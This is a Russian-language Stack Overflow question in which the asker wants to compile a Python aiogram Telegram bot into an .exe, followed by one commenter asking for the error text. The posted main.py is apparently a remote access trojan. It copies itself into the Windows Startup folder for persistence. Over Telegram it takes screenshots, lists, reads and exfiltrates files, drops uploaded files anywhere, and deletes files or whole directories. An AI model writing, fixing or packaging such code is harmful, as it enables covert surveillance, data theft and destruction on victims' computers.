# Не получается создать .exe файл для телеграмм бота

Tags: python, aiogram, бот, exe

у меня есть телеграмм бот в main.py, но при открытии.exe файла возникает ошибка

[image: введите сюда описание изображения]

main.py:

```
import os
import shutil
import sys
from aiogram import Bot, Dispatcher, executor, types
from aiogram.contrib.fsm_storage.memory import MemoryStorage
from aiogram.dispatcher import FSMContext
from aiogram.dispatcher.filters.state import State, StatesGroup
from dotenv import load_dotenv
import pyautogui as py
from aiogram.types import ReplyKeyboardMarkup, KeyboardButton

load_dotenv()
bot = Bot('Token')
storage = MemoryStorage()
dp = Dispatcher(bot=bot, storage=storage)

Thisfile = sys.argv[0]
Thisfile_name = os.path.basename(Thisfile)
user_path = os.path.expanduser('~')

if not os.path.exists(f"{user_path}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\{Thisfile_name}"):
        os.system(f'copy "{Thisfile}" "{user_path}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"')
        print(f'{Thisfile_name} добавлен в автозагрузку')

class AddFile(StatesGroup):
    path = State()
    file = State()


find = KeyboardButton('Find files')
start_menu = ReplyKeyboardMarkup(resize_keyboard=True)
start_menu.add(find)


@dp.message_handler(commands=['start'])
async def start(message: types.Message):
    await bot.send_message(message.chat.id, f'Hello, {message.chat.first_name}')


@dp.message_handler(commands=['screenshot'])
async def screen(message: types.Message):
    screenshot = py.screenshot()
    screenshot.save('screenshot.png')
    with open('screenshot.png', 'rb') as file:
        await bot.send_photo(message.chat.id, file)
    os.remove('screenshot.png')


@dp.message_handler(commands=['addfile'])
async def process_add_file(message: types.Message):
    await AddFile.path.set()
    await bot.send_message(message.chat.id, "Send directory for file")


@dp.message_handler(state=AddFile.path)
async def process_add_file(message: types.Message, state: FSMContext):
    await state.update_data(path=message.text)
    direct = await state.get_data()
    await bot.send_message(message.chat.id, f"Send file for directory `{direct['path']}`", parse_mode='MarkDown')
    await AddFile.file.set()


@dp.message_handler(state=AddFile.file, content_types=types.ContentType.DOCUMENT)
async def handle_file(message: types.Message, state: FSMContext):
    data = await state.get_data()
    directory_path = data['path']

    file_path = await bot.get_file(message.document.file_id)
    downloaded_file = await bot.download_file(file_path.file_path)

    file_name = message.document.file_name
    file_location = f"{directory_path}/{file_name}"

    with open(file_location, "wb") as file:
        file.write(downloaded_file.getvalue())

    await bot.send_message(message.chat.id, f'File has been added to the directory \n`{directory_path}`',
                           parse_mode='MarkDown')

    await state.finish()


@dp.message_handler(state=AddFile.file, content_types=types.ContentType.ANY)
async def handle_invalid_file_type(message: types.Message, state: FSMContext):
    data = await state.get_data()
    directory_path = data['path']
    await bot.send_message(message.chat.id, f'Invalid file type. Please send a document file`{directory_path}`',
                           parse_mode='MarkDown')


@dp.message_handler()
async def command(message: types.Message, state: FSMContext):
    com = message.text.split('-')[0].strip()
    path = message.text.split('-')[-1].strip()

    if com == 'find' and path:
        await process_find_path(message.chat.id, path.strip())
    elif com == 'open' and path:
        await process_open_file(message.chat.id, path.strip())
    elif com == 'download' and path:
        await process_download_file(message.chat.id, path.strip())
    elif com == 'delete' and path:
        await process_delete_file(message.chat.id, path.strip())
    else:
        await bot.send_message(message.chat.id, f'Invalid command')


async def process_find_path(chat_id, path):
    if not os.path.isabs(path):
        path = os.path.join(os.getcwd(), path)

    if os.path.isdir(path):
        files = os.listdir(path)
        await bot.send_message(chat_id, '\n'.join(files) + f'\n\n')
        await bot.send_message(chat_id, f'`{path}`', parse_mode='MarkDown')
    else:
        await bot.send_message(chat_id, 'Invalid path or not a directory')


async def process_open_file(chat_id, path):
    if not os.path.isabs(path):
        path = os.path.join(os.getcwd(), path)

    if os.path.isfile(path):
        with open(path, 'r') as file:
            file_content = file.read()
            await bot.send_message(chat_id, f'\n{file_content}\n\n')
            await bot.send_message(chat_id, f'`{path}`', parse_mode='MarkDown')
    else:
        await bot.send_message(chat_id, 'Invalid path or not a file')


async def process_download_file(chat_id, path):
    if not os.path.isabs(path):
        path = os.path.join(os.getcwd(), path)

    if os.path.isfile(path):
        with open(path, 'rb') as file:
            await bot.send_document(chat_id, file)
    else:
        await bot.send_message(chat_id, 'Invalid path or not a file')


async def process_delete_file(chat_id, path):
    if not os.path.isabs(path):
        path = os.path.join(os.getcwd(), path)

    if os.path.exists(path):
        if os.path.isfile(path):
            os.remove(path)
            await bot.send_message(chat_id, 'File deleted successfully.')
        else:
            shutil.rmtree(path)
            await bot.send_message(chat_id, 'Directory deleted successfully.')
    else:
        await bot.send_message(chat_id, 'Invalid path or does not exist.')


if __name__ == '__main__':
    executor.start_polling(dp)
```

Comment: Абулатив Абума… не важно. Пожалуйста, скопируйте всё то что выдаёт в ошибке и вставьте текстом. На Stackoverflow не принято выкладывать скриншоты ошибок, к тому же часть полезной информации скрыта за кроллом.